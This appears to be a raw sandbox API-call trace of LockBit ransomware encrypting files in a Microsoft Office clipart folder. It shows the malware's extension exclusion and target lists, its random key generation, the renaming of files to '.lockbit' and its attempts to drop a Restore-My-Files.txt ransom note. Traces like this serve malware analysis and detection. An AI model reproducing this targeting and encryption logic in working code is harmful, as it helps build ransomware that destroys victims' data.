lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.648] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199465.WMF.lockbit") returned 72 [0150.648] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199465.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199465.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.649] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.650] malloc (_Size=0x40068) returned 0x3df0008 [0150.650] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5060) returned 1 [0150.650] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.650] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.650] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.651] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.651] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.651] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0150.657] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199465.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199465.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.657] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.657] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0150.657] free (_Block=0x1fa2ed8) [0150.657] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199465.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.657] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.657] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.657] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66031e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x35bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0199469.WMF", cAlternateFileName="")) returned 1 [0150.657] lstrcmpiW (lpString1=".", lpString2="J0199469.WMF") returned -1 [0150.657] lstrcmpiW (lpString1="..", lpString2="J0199469.WMF") returned -1 [0150.657] PathFindExtensionW (pszPath="J0199469.WMF") returned=".WMF" [0150.657] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.658] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.659] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.659] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.660] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0199469.WMF") returned 1 [0150.660] lstrcmpiW (lpString1="ntldr", lpString2="J0199469.WMF") returned 1 [0150.660] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0199469.WMF") returned 1 [0150.660] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0199469.WMF") returned -1 [0150.660] lstrcmpiW (lpString1="autorun.inf", lpString2="J0199469.WMF") returned -1 [0150.660] lstrcmpiW (lpString1="thumbs.db", lpString2="J0199469.WMF") returned 1 [0150.660] lstrcmpiW (lpString1="iconcache.db", lpString2="J0199469.WMF") returned -1 [0150.660] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.660] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199469.WMF") returned=".WMF" [0150.660] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.660] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.660] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.660] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.660] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.660] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.660] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.660] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.660] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.660] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.660] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.660] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.660] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.660] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.660] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.660] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.660] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.661] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.661] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.661] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.661] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.661] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.661] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.661] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.661] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.661] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.661] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.661] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.661] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199469.WMF.lockbit") returned 72 [0150.661] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199469.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199469.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.662] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.662] malloc (_Size=0x40068) returned 0x3df0008 [0150.662] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=13756) returned 1 [0150.662] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.663] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.663] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.663] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.663] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.695] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199469.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199469.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.695] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.695] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0150.697] free (_Block=0x1fa2ed8) [0150.697] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199469.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.697] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.697] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.697] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66031e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2a18, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0199473.WMF", cAlternateFileName="")) returned 1 [0150.697] lstrcmpiW (lpString1=".", lpString2="J0199473.WMF") returned -1 [0150.697] lstrcmpiW (lpString1="..", lpString2="J0199473.WMF") returned -1 [0150.697] PathFindExtensionW (pszPath="J0199473.WMF") returned=".WMF" [0150.697] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.697] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.697] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.697] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.697] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.697] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.697] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.697] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.698] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.698] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.699] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.699] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.699] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.699] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.699] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.699] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.699] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.699] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.699] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.699] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.699] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.699] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.699] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.699] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.699] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.699] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.699] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0199473.WMF") returned 1 [0150.699] lstrcmpiW (lpString1="ntldr", lpString2="J0199473.WMF") returned 1 [0150.699] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0199473.WMF") returned 1 [0150.699] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0199473.WMF") returned -1 [0150.699] lstrcmpiW (lpString1="autorun.inf", lpString2="J0199473.WMF") returned -1 [0150.699] lstrcmpiW (lpString1="thumbs.db", lpString2="J0199473.WMF") returned 1 [0150.699] lstrcmpiW (lpString1="iconcache.db", lpString2="J0199473.WMF") returned -1 [0150.699] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.700] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199473.WMF") returned=".WMF" [0150.700] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.700] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.700] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.701] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.701] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.701] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.701] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.701] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.701] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.701] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199473.WMF.lockbit") returned 72 [0150.701] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199473.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199473.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.702] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.702] malloc (_Size=0x40068) returned 0x3df0008 [0150.702] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10776) returned 1 [0150.702] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.703] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.703] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.704] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.704] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.706] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199473.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199473.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.706] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.706] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.707] free (_Block=0x1fa2ed8) [0150.707] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199473.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.707] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.707] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.708] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5655cfd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1484, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0199475.WMF", cAlternateFileName="")) returned 1 [0150.708] lstrcmpiW (lpString1=".", lpString2="J0199475.WMF") returned -1 [0150.708] lstrcmpiW (lpString1="..", lpString2="J0199475.WMF") returned -1 [0150.708] PathFindExtensionW (pszPath="J0199475.WMF") returned=".WMF" [0150.708] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.708] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.708] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.708] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.708] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.708] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.708] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.708] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.708] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.708] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.708] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.708] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.708] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.708] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.708] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.708] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.708] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.709] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.709] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.709] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.709] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.709] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.709] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.709] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.709] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.709] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.709] lstrcmpiW (lpString1=".drv", 